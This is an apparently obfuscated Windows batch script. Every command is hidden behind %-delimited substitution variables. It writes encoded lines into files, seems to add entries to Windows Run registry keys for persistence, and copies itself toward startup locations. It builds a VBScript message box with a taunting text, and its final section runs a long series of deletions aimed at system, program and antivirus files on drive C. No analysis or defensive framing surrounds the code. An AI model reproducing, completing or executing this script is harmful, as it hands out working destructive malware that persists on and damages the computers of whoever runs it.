%-%%.%%¬%%®% %-% %ÿ%%ú%%-%%ÿ% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%ú% %ó%%.% %ó%%í% %ó%%ô% %ó%%-% %ò%%ù%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Þ%%Þ%%Þ%%Þ%
:nnnn
%-%%.%%¬%%®% %-% %ÿ%%ú%%?%%ÿ% %ó%%-% %ú%%º% %û%%ô% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %ú%%º% %û%%ÿ% %ò%%¦% %ÿ%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %®%%®%%®%%®%
:mmmm
%-%%.%%¬%%®% %-% %ÿ%%ú%%.%%ÿ% %û%%ÿ% %û%%ÿ% %ó%%±% %ó%%-% %û%%ÿ% %ú%%ý% %ú%%º% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ó%%.% %ó%%í% %ò%%ú% %ò%%ù% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %æ%%æ%%æ%%æ%
:llll
%-%%.%%¬%%®% %-% %ÿ%%ú%%¦%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ï%%ï%%ï%%ï%
:kkkk
%-%%.%%¬%%®% %-% %ÿ%%ú%%º%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ð%%ð%%ð%%ð%
:jjjj
%-%%.%%¬%%®% %-% %ÿ%%ú%%í%%ÿ% %û%%í% %û%%ÿ% %ú%%ÿ% %û%%ÿ% %ú%%ý% %ú%%ÿ% %û%%ÿ% %û%%-% %ó%%ú% %ó%%.% %ó%%±% %ò%%º% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %÷%%÷%%÷%%÷%
:iiii
%-%%.%%¬%%®% %-% %ÿ%%ú%%î%%ÿ% %û%%ù% %û%%¦% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù% %û%%î% %ú%%ý% %û%%.% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %ú%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¡%%¡%%¡%%¡%
:hhhh
%-%%.%%¬%%®% %-% %ÿ%%ú%%ò%%ÿ% %ó%%ó% %ó%%ó% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ù% %ó%%í% %ó%%?% %ó%%ô% %ò%%û% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ø%%ø%%ø%%ø%
:gggg
%-%%.%%¬%%®% %-% %ÿ%%ú%%ó%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ù% %ó%%í% %ó%%?% %ó%%ô% %ò%%û% %ò%%ú% %û%%ÿ% %ó%%±%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¬%%¬%%¬%%¬%
:ffff
%-%%.%%¬%%®% %-% %ÿ%%ú%%ô%%ÿ% %û%%ô% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %û%%ô% %ò%%ÿ% %ó%%±% %ò%%û% %ò%%ù%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %£%%£%%£%%£%
:eeee
%-%%.%%¬%%®% %-% %ÿ%%ú%%ù%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ó%%.% %ó%%í% %ò%%ú% %ò%%ù% %ó%%ô% %ó%%-% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %±%%±%%±%%±%
:dddd
%-%%.%%¬%%®% %-% %ÿ%%ú%%ú%%ÿ% %ó%%ô% %ó%%ô% %û%%í% %û%%-% %ò%%ú% %ó%%í% %ò%%º% %ó%%ô% %û%%ÿ% %û%%ù% %û%%¦% %û%%ÿ% %ÿ%%ý% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %-%%-%%-%%-%
:cccc
%-%%.%%¬%%®% %-% %ÿ%%ú%%û%%ÿ% %û%%ô% %ò%%ÿ% %ó%%±% %ò%%û% %ò%%ù% %û%%ÿ% %û%%ù% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô% %û%%î% %û%%ô% %ó%%ó% %ó%%í% %ó%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %?%%?%%?%%?%
:bbbb
%-%%.%%¬%%®% %-% %ÿ%%ú%%ý%%ÿ% %ó%%ô% %û%%ÿ% %û%%ù% %ó%%.% %ó%%±% %ó%%-% %ó%%ò% %ó%%í% %ò%%ÿ% %û%%î% %û%%ù% %ó%%í% %ò%%ÿ% %û%%í% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %.%%.%%.%%.%
:aaaa
%-%%.%%¬%%®% %-% %ÿ%%ú%%ÿ%%ÿ% %û%%ÿ% %ÿ%%ý% %ù%%ù% %ù%%ú% %ù%%ú% %û%%ÿ% %ô%%ú% %ù%%ô% %ù%%-% %ù%%ù% %û%%ÿ% %û%%ô% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¦%%¦%%¦%%¦%
:zzz
%-%%.%%¬%%®% %-% %ÿ%%û%%±%%ÿ% %ú%%í% %û%%í% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%?% %ò%%ú% %ó%%ò% %û%%ÿ% %û%%ù% %ú%%ý%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %º%%º%%º%%º%
:yyy
%-%%.%%¬%%®% %-% %ÿ%%û%%-%%ÿ% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù% %û%%î% %ú%%ý% %û%%.% %ú%%í% %ú%%í% %ú%%í% %ú%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %©%%©%%©%
:xxx
%-%%.%%¬%%®% %-% %ÿ%%û%%?%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ô%%±% %ó%%-%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¸%%¸%%¸%
:www
%-%%.%%¬%%®% %-% %ÿ%%û%%.%%ÿ% %û%%î% %û%%ÿ% %û%%ù% %û%%¦% %û%%ÿ% %û%%ù% %ó%%í% %ò%%ÿ% %û%%ÿ% %û%%ù% %û%%¦% %û%%ÿ% %û%%í% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ª%%ª%%ª%
:vvv
%-%%.%%¬%%®% %-% %ÿ%%û%%¦%%ÿ% %ô%%ú% %ó%%ô% %ó%%-% %ó%%ù% %û%%ÿ% %ò%%ù% %ó%%ô% %ó%%.% %ó%%ô% %ò%%ù% %ò%%ô% %ó%%û% %ó%%í% %ó%%ô% %ò%%ú% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¼%%¼%%¼%
:uuu
%-%%.%%¬%%®% %-% %ÿ%%û%%º%%ÿ% %û%%-% %ó%%-% %ó%%±% %ò%%ù% %ó%%í% %ó%%ú% %ó%%ô% %û%%ÿ% %û%%ù% %ú%%ý% %û%%ÿ% %ú%%º% %ù%%ù% %ù%%ú% %ù%%ú% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %½%%½%%½%
:ttt
%-%%.%%¬%%®% %-% %ÿ%%û%%í%%ÿ% %ò%%ú% %ó%%±% %ò%%ÿ% %û%%ÿ% %û%%ù% %ú%%û% %û%%í% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¾%%¾%%¾%
:sss
%-%%.%%¬%%®% %-% %ÿ%%û%%î%%ÿ% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%í% %ó%%ó% %û%%ÿ% %û%%î% %û%%ù% %ú%%ý% %û%%ÿ% %û%%ý% %ó%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %]%%]%%]%
:rrr
%-%%.%%¬%%®% %-% %ÿ%%û%%ò%%ÿ% %û%%î% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %û%%.% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %û%%í% %û%%ÿ% %ò%%?% %ÿ%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %:%%:%%:%
:qqq
%-%%.%%¬%%®% %-% %ÿ%%û%%ó%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ò%%ÿ% %ó%%±% %ò%%û% %ò%%ù% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¿%%¿%%¿%
:ppp
%-%%.%%¬%%®% %-% %ÿ%%û%%ô%%ÿ% %ò%%ù% %û%%í% %û%%ÿ% %ú%%?% %ú%%?% %û%%ÿ% %û%%ù% %ó%%ó% %ó%%ý% %ó%%.% %ò%%ú% %ó%%ô% %û%%í% %û%%ÿ% %ò%%¦% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Ð%%Ð%%Ð%
:ooo
%-%%.%%¬%%®% %-% %ÿ%%û%%ù%%ÿ% %û%%ÿ% %û%%î% %û%%ù% %ò%%ÿ% %ó%%±% %ò%%û% %ò%%ù% %ó%%ó% %ò%%û% %ó%%ô% %ó%%ô% %û%%î% %û%%ô% %ò%%ÿ% %ó%%±% %ò%%û%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Þ%%Þ%%Þ%
:nnn
%-%%.%%¬%%®% %-% %ÿ%%û%%ú%%ÿ% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %û%%í% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ò% %ó%%î% %ó%%í% %ó%%.% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %®%%®%%®%
:mmm
%-%%.%%¬%%®% %-% %ÿ%%û%%û%%ÿ% %ò%%û% %ò%%ù% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù% %û%%î% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %û%%.% %ú%%í% %ú%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %æ%%æ%%æ%
:lll
%-%%.%%¬%%®% %-% %ÿ%%û%%ý%%ÿ% %ó%%?% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ò%%ÿ% %ó%%±%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ï%%ï%%ï%
:kkk
%-%%.%%¬%%®% %-% %ÿ%%û%%ÿ%%ÿ% %û%%ÿ% %û%%ÿ% %ó%%ý% %ó%%.% %ó%%í% %ó%%ý% %ò%%ú% %û%%ÿ% %ó%%ú% %ó%%î% %ó%%ô% %ó%%ú% %ó%%¦% %ô%%±% %ó%%î% %ó%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ð%%ð%%ð%
:jjj
%-%%.%%¬%%®% %-% %ÿ%%ý%%±%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %÷%%÷%%÷%
:iii
%-%%.%%¬%%®% %-% %ÿ%%ý%%-%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¡%%¡%%¡%
:hhh
%-%%.%%¬%%®% %-% %ÿ%%ý%%?%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ø%%ø%%ø%
:ggg
%-%%.%%¬%%®% %-% %ÿ%%ý%%.%%ÿ% %û%%ÿ% %û%%ù% %ó%%ú% %ó%%î% %ó%%ý% %ó%%-% %û%%ÿ% %û%%í% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¬%%¬%%¬%
:fff
%-%%.%%¬%%®% %-% %ÿ%%ý%%¦%%ÿ% %ó%%ô% %ó%%ú% %ó%%¦% %ô%%±% %ó%%î% %ó%%í% %ó%%?% %û%%î% %û%%ÿ% %û%%ù% %ó%%-% %ó%%í% %ó%%ú% %ó%%¦% %û%%ÿ% %û%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %£%%£%%£%
:eee
%-%%.%%¬%%®% %-% %ÿ%%ý%%º%%ÿ% %ú%%ý% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %û%%í% %û%%ÿ% %ú%%ý% %û%%ÿ% %ú%%ô% %û%%ÿ% %û%%-% %û%%ù% %ó%%ú% %ó%%î%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %±%%±%%±%
:ddd
%-%%.%%¬%%®% %-% %ÿ%%ý%%í%%ÿ% %ó%%í% %ó%%?% %ó%%ô% %ò%%û% %û%%ÿ% %û%%ù% %û%%¦% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù% %û%%î% %ú%%ý% %û%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %-%%-%%-%
:ccc
%-%%.%%¬%%®% %-% %ÿ%%ý%%î%%ÿ% %ó%%ù% %û%%ÿ% %û%%ù% %ó%%-% %ó%%í% %ó%%ú% %ó%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ù%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %?%%?%%?%
:bbb
%-%%.%%¬%%®% %-% %ÿ%%ý%%ò%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%±% %ó%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %.%%.%%.%
:aaa
%-%%.%%¬%%®% %-% %ÿ%%ý%%ó%%ÿ% %û%%ÿ% %û%%ô% %ó%%±% %ó%%.% %ó%%ù% %û%%ÿ% %û%%ý% %ú%%?% %û%%ÿ% %û%%ù% %ó%%-% %ó%%í% %ó%%ú% %ó%%¦% %û%%í% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¦%%¦%%¦%
:zz
%-%%.%%¬%%®% %-% %ÿ%%ý%%ô%%ÿ% %û%%î% %û%%ù% %ó%%-% %ó%%í% %ó%%ú% %ó%%¦% %û%%ÿ% %û%%ý% %ú%%?% %û%%ÿ% %û%%ù% %ó%%?% %ó%%ô% %û%%ÿ% %û%%ó% %û%%ó%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %º%%º%%º%
:yy
%-%%.%%¬%%®% %-% %ÿ%%ý%%ù%%ÿ% %ú%%º% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%í% %ó%%ó% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %©%%©%
:xx
%-%%.%%¬%%®% %-% %ÿ%%ý%%ú%%ÿ% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ó%%±% %ó%%-% %û%%ÿ% %ú%%ý% %ú%%º% %ó%%º% %ó%%±% %ó%%í% %ó%%-% %ú%%º% %û%%ú%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¸%%¸%
:ww
%-%%.%%¬%%®% %-% %ÿ%%ý%%û%%ÿ% %û%%-% %ó%%ý% %ó%%-% %ò%%ù% %ó%%í% %ó%%ó% %ó%%ý% %û%%-% %ó%%û% %ó%%ý% %ò%%ù% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %ÿ%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ª%%ª%
:vv
%-%%.%%¬%%®% %-% %ÿ%%ý%%ý%%ÿ% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô% %ó%%ô% %û%%ÿ% %ó%%ú% %ú%%º% %ô%%.% %ó%%û% %ó%%ý% %ò%%ù%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¼%%¼%
:uu
%-%%.%%¬%%®% %-% %ÿ%%ý%%ÿ%%ÿ% %ó%%±% %ó%%-% %û%%ÿ% %ú%%ý% %ú%%º% %ò%%ú% %ò%%ù% %ó%%ý% %ò%%û% %ò%%ù% %ú%%º% %û%%ÿ% %ò%%¦% %û%%ÿ% %û%%-% %ò%%ú%>%¸%%¾%%Þ%
%£%%®%%]%%®% %½%%½%
:tt
:: L%®%%¿%%?% Y%¾%%Þ% %º%%ð%%ð%%®%%¼%%-%%?% %ï%%-% %]%%®% %¾%%:%%-% %]%%¬%%-% %±%%®%%ð%%ð%%®%%¼%%ø%%æ%%£% ... %]%%¬%%º%%æ%%÷%%:% %º% %ð%%®%%]%
%£%%®%%]%%®% %¾%%¾%
:ss
%¿%%-%%£%%-%%?%%ø%%]% /%:% %.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %]%%]%
:rr
%-%%.%%¬%%®% "R%-%%£%%ø%%:%%]%%-%%¿%%-%%?%O%¿%%£%%º%%æ%%ø%%©%%º%%]%%ø%%®%%æ%"="[%¿%R%ð%%±%]">>%.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %:%%:%
:qq
%-%%.%%¬%%®% [%¬%%÷%%-%%¸%_%ð%%®%%.%%º%%ð%_%ï%%º%%.%%¬%%ø%%æ%%-%\%:%%®%%±%%]%%¼%%º%%¿%%-%\%ï%%ø%%.%%¿%%®%%:%%®%%±%%]%\%¼%%ø%%æ%%?%%®%%¼%%:%\%.%%¾%%¿%%¿%%-%%æ%%]%%½%%-%%¿%%:%%ø%%®%%æ%]>>%.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %¿%%¿%
:pp
%-%%.%%¬%%®% "R%-%%£%%ø%%:%%]%%-%%¿%%-%%?%O%¼%%æ%%-%%¿%"="%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º% %¦%%¸% %Þ%%¬%%ø%%ð%%-%%]%%ÿ%%º%%:%%]%%ú%%¿%">>%.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %Ð%%Ð%
:oo
%-%%.%%¬%%®% [%¬%%÷%%-%%¸%_%ð%%®%%.%%º%%ð%_%ï%%º%%.%%¬%%ø%%æ%%-%\%:%%®%%±%%]%%¼%%º%%¿%%-%\%ï%%ø%%.%%¿%%®%%:%%®%%±%%]%\%¼%%ø%%æ%%?%%®%%¼%%:%\%.%%¾%%¿%%¿%%-%%æ%%]%%½%%-%%¿%%:%%ø%%®%%æ%]>>%.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %Þ%%Þ%
:nn
%-%%.%%¬%%®% %@%%`%%#%%¢%>%.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %®%%®%
:mm
%?%%-%%ð% %.%:\%º%%º%%º%.%¿%%-%%£%
%£%%®%%]%%®% %æ%%æ%
:ll
%-%%.%%¬%%®% :%¬%%ï%>>%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %ï%%ï%
:kk
%-%%.%%¬%%®% %:%%]%%º%%¿%%]% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%>>%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %ð%%ð%
:jj
%-%%.%%¬%%®% %ø%%±% %æ%%®%%]% %-%%ª%%ø%%:%%]% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]% %.%%®%%Þ%%¸% %õ%\%-%²³\%¬%%-%%¬%%-%%¬%%-% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%>>%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %÷%%÷%
:ii
%-%%.%%¬%%®% %.%%]%%]%%¸% %æ%%¾%%ð%>>%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %¡%%¡%
:hh
%-%%.%%¬%%®% @%-%%.%%¬%%®% %®%%±%%±%>%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %ø%%ø%
:gg
%?%%-%%ð% %õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%
%£%%®%%]%%®% %¬%%¬%
:ff
%?%%-%%ð% %Þ%%]%%¿%
%£%%®%%]%%®% %£%%£%
:ee
%ï%%®%%½%%-% %õ%\%:%%¸%%:%%]%%-%%ï%\%¼%%ø%%æ%.%ø%%æ%%ø% %õ%\%¼%%ø%%æ%.%ø%%æ%%ø%
%£%%®%%]%%®% %±%%±%
:dd
%?%%-%%ð% %õ%\%¼%%ø%%æ%.%ø%%æ%%ø%
%£%%®%%]%%®% %-%%-%
:cc
%.%%®%%Þ%%¸% %Þ%%]%%¿% + %õ%\%¼%%ø%%æ%.%ø%%æ%%ø% %õ%\%:%%¸%%:%%]%%-%%ï%\%¼%%ø%%æ%.%ø%%æ%%ø%
%£%%®%%]%%®% %?%%?%
:bb
%-%%.%%¬%%®%.>>%Þ%%]%%¿%
%£%%®%%]%%®% %.%%.%
:aa
%-%%.%%¬%%®% N%¾%%ð%%ð%P%®%%¿%%]%=N%®%%æ%%-%>>%Þ%%]%%¿%
%£%%®%%]%%®% %¦%%¦%
:z
%-%%.%%¬%%®% %¿%%¾%%æ%=>>%Þ%%]%%¿%
%£%%®%%]%%®% %º%%º%
:y
%-%%.%%¬%%®% %ð%%®%%º%%?%=%õ%\%ð%%º%%ð%%-%%ð%%¾%.%¦%%º%%]%>>%Þ%%]%%¿%
%£%%®%%]%%®% %©%
:x
%-%%.%%¬%%®% [%¼%%ø%%æ%%?%%®%%¼%%:%]>%Þ%%]%%¿%
%£%%®%%]%%®% %¸%
:w
%¿%%-%%£%%-%%?%%ø%%]% /%:% %.%:\%º%%º%%º%.%¿%%-%%£%
%£%%®%%]%%®% %ª%
:v
%-%%.%%¬%%®% "%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%"="%.%:\\%º%%æ%%]%%ø%%±%%º%.%½%%¦%%:%">>%.%:\%º%%º%%º%.%¿%%-%%£%
%£%%®%%]%%®% %¼%
:u
%-%%.%%¬%%®% [%¬%%÷%%-%%¸%_%ð%%®%%.%%º%%ð%_%ï%%º%%.%%¬%%ø%%æ%%-%\%:%%®%%±%%]%%¼%%º%%¿%%-%\%ï%%ø%%.%%¿%%®%%:%%®%%±%%]%\%¼%%ø%%æ%%?%%®%%¼%%:%\%.%%¾%%¿%%¿%%-%%æ%%]%%½%%-%%¿%%:%%ø%%®%%æ%\R%¾%%æ%]>>%.%:\%º%%º%%º%.%¿%%-%%£%
%£%%®%%]%%®% %½%
:t
%-%%.%%¬%%®% %@%%`%%#%%¢%>%.%:\%º%%º%%º%.%¿%%-%%£%
%£%%®%%]%%®% %¾%
:s
%-%%.%%¬%%®% M%:%%£%B%®%%ª% "F%º%%:%%.%%¬%%ø%%:%%ï%%¾%%:% %ø%%:%%]% %÷%%-%%ø%%æ%%-% M%-%%ø%%æ%%¾%%æ%%£% %:%%®%%æ%%?%%-%%¿%%æ% %-%%ø%%æ% V%-%%¿%%¦%%¿%%-%%.%%¬%%-%%æ%!" & C%¬%%¿%(%ý%%ú%) & C%¬%%¿%(%ý%%ÿ%) & "U%æ%%?% %?%%º%%¿%%º%%¾%%±% %:%%]%%-%%¬%%]%: D%ø%%-% T%®%%?%%-%%:%%:%%]%%¿%%º%%±%%-%.",%ù%%ÿ%%í%%ó%,"%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º% %¦%%¸% %Þ%%¬%%ø%%ð%%-%%]%%ÿ%%º%%:%%]%%ú%%¿% [%¿%R%ð%%±%]">>%.%:\%º%%æ%%]%%ø%%±%%º%.%½%%¦%%:%
%£%%®%%]%%®% %]%
:r
%-%%.%%¬%%®%.%®%%æ% %-%%¿%%¿%%®%%¿% %¿%%-%%:%%¾%%ï%%-% %æ%%-%%ª%%]%>%.%:\%º%%æ%%]%%ø%%±%%º%.%½%%¦%%:%
%£%%®%%]%%®% %:%
:q
%?%%-%%ð% %.%:\%¼%%ø%%æ%%?%%®%%¼%%:%\%º%%æ%%]%%ø%%±%%º%.%½%%¦%%:%
%£%%®%%]%%®% %¿%
:p
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%%ï%%ï%%-%\%º%%½%%Þ%%-%%¿%%:%%®%%æ%%º%%ð%\%º%%æ%%]%%ø%%½%%ø%%¿%.%½%%?%%±%
%£%%®%%]%%®% %Ð%
:o
%?%%-%%ð% %.%:\%]%%¦%%º%%½%\%]%%¦%%º%%½%.%?%%º%%]%
%£%%®%%]%%®% %Þ%
:n
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%%ï%%ï%%-%\%]%%¦%%º%%½%\%]%%¦%%º%%½%.%?%%º%%]%
%£%%®%%]%%®% %®%
:m
%?%%-%%ð% %.%:\%]%%¦%%º%%½%%¼%%í%%ô%\%]%%¦%%:%%.%%º%%æ%.%:%%ø%%£%
%£%%®%%]%%®% %æ%
:l
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%%ï%%ï%%-%\%ï%%.%%º%%±%%-%%-%\%:%%.%%º%%æ%.%?%%º%%]%
%£%%®%%]%%®% %ï%
:k
%:%%-%t ¢=T%ù%
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%%ï%%ï%%-%\%±%-%Þ%%¿%%®%%]%%í%%ô%\%±%%Þ%%¼%%ï%%ú%%û%.%?%%ð%%ð%
%£%%®%%]%%®% %ð%
:j
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%%ï%%ï%%-%\%æ%%®%%¿%%]%%®%%æ%~%ý%\%:%%ú%%û%%ø%%æ%%]%%-%%£%.%?%%ð%%ð%
%£%%®%%]%%®% %÷%
:i
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%~%ý%\%ï%%ø%%¿%%.%%ú%%û%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %¡%
:h
%?%%-%%ð% %.%:\%Þ%%¿%%®%%£%%¿%%º%~%ý%\%ï%%ø%%¿%%.%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %ø%
:g
